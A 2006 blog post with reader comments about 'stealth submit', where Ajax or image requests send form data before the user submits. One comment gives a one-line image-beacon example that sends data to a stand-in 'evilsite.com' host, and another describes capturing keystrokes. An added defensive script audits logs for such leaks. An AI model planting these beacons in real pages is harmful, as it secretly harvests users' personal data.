Friday, March 10th, 2006

Sneaky Submissions Supported by Ajax?

Category: Ajax, Examples

Rian brings to light a somewhat sneaky use of Ajax that could make web surfers a bit more wary of filling out the online forms they come across. The practice, which he calls a “stealth submit”, involves sending form data from a user’s session before they’ve hit the submit button.

Have you ever started filling a web form and halfway into it decided against submitting because suddenly you no longer trust the website enough? You closed the browser window and that was the end of story, right? Wrong! The website might still have your information. You think it’s impossible? This article will show you how it can be done. I call the technique Stealth Submit.

He’s created an example of how this method is used: basically a JavaScript event handler that fires whenever a field loses focus. The data from the field is shipped off in an Ajax request and stored somewhere server-side for future use.

Of course, his post puts more of a malicious spin on this kind of Ajax use, but there are valid reasons to use this kind of method. One that immediately comes to mind is the “username check” that some sites do to ensure that your selected name is unique in their system. It’s all about perception really…

Posted by Chris Cornutt at 10:04 am

11 Comments

Sneaky submissions and other evil activities are “supported” by JavaScript in general, not limited to just Ajax – i.e., cross-domain scripting “vulnerabilities.”

The developer of a site could remotely load a <script> element with parameters (perhaps your cookie, if it isn’t their site?), submit form data in the same fashion – perhaps creating an iframe or loading an image, also not subject to domain restrictions, i.e. var i = new Image(); i.src = 'http://www.evilsite.com/?c='+someDataHere;
Bottom line is, if you’re paranoid, I’d turn Javascript off! :)

Comment by Scott Schiller — March 10, 2006

Yeah, this isn’t really anything new. It’s pretty much the definition of AJAX, to be able to send calls in the background. Ultimately, I doubt most companies would have the audacity to use such information, nor would they see the ROI for it.

Comment by David Kaneda — March 10, 2006

No offense, David, but that sounds incredibly naive. With marketers being who they are, *any* data about customers and near customers is going to be valuable and they won’t think twice about using it — or selling it.

Comment by Charles H — March 10, 2006

I’m going to have to agree with Charles here. I worked for a rather large online advertising company (that will remain nameless) and was tasked with building an AJAXified script that would auto-attach itself to form elements and report back to the server whatever a user entered/selected, regardless of submission. I don’t remember their rationalization of this, other than collecting information on people who began filling out forms and stopped midway.

Comment by Daniel V — March 10, 2006

I would disagree there Charles, seriously, we pay lots of money to Web tracking companies who provide us with huge reports full of meaningless numbers and data about how customers use our sites. It may cost lots of money, but it is in actuality of very little value.

Comment by Chris — March 10, 2006

Any dynamically updated element could do this. For example, you could use an “onchange” or “onkeydown” or “onmousedown” call (why rely on “onblur” when you can capture each and every keystroke) to update a hidden image’s src element. Pass some information in the Querystring (for example, the form’s current state), and use a server-side script to store this information and return the same hidden image. It would work just the same as the AJAX version but wouldn’t require XMLHTTP at all. And, as Scott pointed out, you’d get past the same-domain requirement of XMLHTTP. So you could have “good looking domain” submitting your keystrokes to “overtly evil domain” or to “big advertising firm’s domain”. (Whether they are one and the same is purely a matter of opinion. ;-) )

Of course, I personally don’t see this as any flaw in AJAX (or JavaScript adjusted HTML). It’s a tool. The tool could be used for good purposes (e.g. GMail’s auto-draft saving) or bad purposes (e.g. a phisher capturing info before you hit the submit button).

Comment by Jason Levine — March 10, 2006
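
An added example, not code from the post or from any commenter: one way to audit a page for the behaviour described in the post (an onblur Ajax call) and in the comments above (an image beacon to another domain). It scans a chronological log of typed values and outbound requests and reports every request that carried a field value before submit. The event shape, function names and sample log are assumptions constructed for illustration; in practice the log would come from a proxy capture or browser tooling.

```javascript
// Added example (Node.js). Event shape, names and sample data are constructed.

// Encodings a script might apply to a field value before sending it.
function encodings(value) {
  const uri = encodeURIComponent(value);
  return [
    value,
    uri,
    uri.replace(/%20/g, '+'), // form-urlencoded spaces
    Buffer.from(value, 'utf8').toString('base64'),
  ];
}

// Walk a chronological event log and report every request that carried a
// typed field value before the user submitted the form.
function findPreSubmitLeaks(events, pageOrigin, minLen = 4) {
  const typed = new Map(); // field name -> latest value typed
  const leaks = [];
  for (const ev of events) {
    if (ev.type === 'submit') break; // after submit, sending is expected
    if (ev.type === 'input') { typed.set(ev.field, ev.value); continue; }
    if (ev.type !== 'request') continue;
    const haystack = ev.url + '\n' + (ev.body || '');
    for (const [field, value] of typed) {
      if (value.length < minLen) continue; // short values match by accident
      if (!encodings(value).some((e) => haystack.includes(e))) continue;
      const crossOrigin = new URL(ev.url).origin !== pageOrigin;
      leaks.push({ t: ev.t, field, via: ev.via, crossOrigin });
    }
  }
  return leaks;
}

// Constructed log: a same-origin username check, an onblur XHR, an image beacon.
const PAGE = 'https://shop.example';
const SAMPLE_EVENTS = [
  { t: 1, type: 'input', field: 'username', value: 'alice_w' },
  { t: 2, type: 'request', via: 'xhr', url: PAGE + '/check?u=alice_w' },
  { t: 3, type: 'input', field: 'email', value: 'alice@example.com' },
  { t: 4, type: 'request', via: 'xhr', url: PAGE + '/save', body: 'v=alice%40example.com' },
  { t: 5, type: 'input', field: 'phone', value: '555 0100' },
  { t: 6, type: 'request', via: 'img',
    url: 'https://tracker.example/p.gif?s=' + Buffer.from('555 0100').toString('base64') },
  { t: 7, type: 'submit' },
  { t: 8, type: 'request', via: 'form', url: PAGE + '/order', body: 'email=alice%40example.com' },
];

console.log(findPreSubmitLeaks(SAMPLE_EVENTS, PAGE));
```

The same-origin username check is reported alongside the other two; the `crossOrigin` flag and the field name are what a reviewer uses to separate an expected lookup from data leaving for a third party.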

On a kind-of-related note, I was half-tempted to write in to the Guardian after their rather sensationalist article on the dangers of AJAX.
http://technology.guardian.co.uk/weekly/story/0,,1726234,00.html if anyone fancies a read

Comment by Greg — March 10, 2006

There is another take on this sneaky submit, which comes into the picture when we use autofill, like from Google or others like Gator. I wonder if, when a website has hidden fields for email and phone number and someone does an auto submit, the data gets passed along too without the user’s knowledge.

Comment by Virender Dogra — March 10, 2006

Blogger autosaves my post as a draft every now and then. That’s good, because it saves me from browser crashes (which don’t really happen for me, but still). I’d started composing a post on Blogger, and decided halfway through that I wasn’t ready to post it, and decided to close my browser window. Blogger had autosaved a draft a while ago, and I didn’t think anything of it.

I opened my aggregator a little while later, and right there was my half written post, autosaved, AND autopublished.

This I did not like.

Comment by Philip Tellis — March 11, 2006

This type of behaviour does give me the fear, but as this post quite rightly says – it’s also incredibly damn useful, when used legitimately(sp?).

Maybe some sort of “Save my details as I go” checkbox on forms should start appearing?

Comment by Skip Chris — March 13, 2006

Agree with ‘Skip’.
Maybe it’s time for a ‘Save As I go’ checkbox. But then wouldn’t everyone choose to enable that? So what’s the difference between providing the checkbox and not providing it? Choice?
It is quite frustrating to see a post that I have carved up so painstakingly disappear in a flash (pun unintended)
At the same time it is scary to let my passwords float away into the inky voids of Cyberspace.
A middle ground, anyone?
Regards,
Shri.

Comment by Shrikant Joshi — March 15, 2006
